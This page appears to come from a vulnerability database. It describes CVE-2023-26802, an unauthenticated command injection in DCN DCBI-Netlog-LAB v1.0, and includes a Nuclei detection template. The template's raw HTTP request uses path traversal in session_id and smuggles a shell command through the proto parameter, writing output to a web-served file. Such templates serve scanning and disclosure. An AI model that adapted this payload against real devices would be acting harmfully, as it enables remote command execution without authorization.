漏洞描述
An issue in the component /network_config/nsg_masq.cgi of DCN (Digital China Networks) DCBI-Netlog-LAB v1.0 allows attackers to bypass authentication and execute arbitrary commands via a crafted request.
CVE-2023-26802: DCBI-Netlog-LAB v1.0 - Command Injection
PoC代码[已公开]
id: CVE-2023-26802
info:
name: DCBI-Netlog-LAB v1.0 - Command Injection
author: pussycat0x
severity: critical
description: |
An issue in the component /network_config/nsg_masq.cgi of DCN (Digital China Networks) DCBI-Netlog-LAB v1.0 allows attackers to bypass authentication and execute arbitrary commands via a crafted request.
reference:
- https://web.archive.org/web/20230605051153/https://github.com/winmt/my-vuls/tree/main/DCN%20DCBI-Netlog-LAB
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-26802
cwe-id: CWE-22
epss-score: 0.77446
epss-percentile: 0.98946
cpe: cpe:2.3:o:dcnglobal:dcbi-netlog-lab_firmware:1.0:*:*:*:*:*:*:*
metadata:
vendor: dcnglobal
product: dcbi-netlog-lab_firmware
tags: cve,cve2023,rce,unauth,netlog
variables:
file_name: "{{rand_text_alpha(4)}}.html"
http:
- raw:
- |
GET /cgi-bin/network_config/nsg_masq.cgi?user_name=admin&session_id=../&lang=zh_CN.UTF-8&act=2&proto=;ls>/usr/local/lyx/lyxcenter/web/{{file_name}}; HTTP/1.1
Host: {{Hostname}}
DNT: 1
X-Forwarded-For: 8.8.8.8
- |
GET /{{file_name}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
DNT: 1
X-Forwarded-For: 8.8.8.8
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "nsg_bridge.cgi"
- "nsg_dhcpactiveip.cgi"
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502200a072e06d270b4821ee375498c48c75bd0af1771496a2845eb9fee099ff9817e022100aa9a006a0dd4e8a86a7583e947e718978746b95171e7be3b70ae44d1c98cd80f:922c64590222798bb761d5b6d8e72950